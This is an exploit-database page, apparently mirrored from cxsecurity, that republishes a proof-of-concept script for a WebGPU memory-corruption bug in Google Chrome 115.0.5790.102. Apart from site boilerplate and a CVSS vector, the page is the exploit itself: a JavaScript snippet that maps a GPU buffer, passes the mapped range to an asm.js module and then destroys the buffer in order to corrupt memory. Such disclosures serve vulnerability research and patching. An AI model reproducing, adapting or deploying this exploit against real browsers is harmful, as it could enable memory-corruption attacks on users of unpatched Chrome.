Advertisement






Google Chrome 115.0.5790.102 Memory Corruption

CVE Category Price Severity
Author Risk Exploitation Type Date
2023-07-25
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070060

Below is a copy:

Google Chrome 115.0.5790.102 Memory Corruption
<script>
/*
Google Chrome WebGPU Memory Corruption
Author: Jean Pereira <[email protected]>
Released: 2023/06/25
Vendor: https://www.google.com
Software: https://www.google.com/chrome/
Tested with version: 115.0.5790.102 (latest version)
*/

navigator.gpu.requestAdapter().then(a => {
  a.requestDevice().then(d => {
    const b = d.createBuffer({
      mappedAtCreation: true,
      size: 0x1000,
      usage: GPUBufferUsage.MAP_WRITE,
    })

    function asm(s, a, b) {
      'use asm'
      var arr = new s.Uint32Array(b)

      function nop(x) {
        x = x | 0
      }
      return nop
    }

    asm({
      Uint32Array: Uint32Array
    }, {}, b.getMappedRange())

    b.destroy()
  })
})
</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.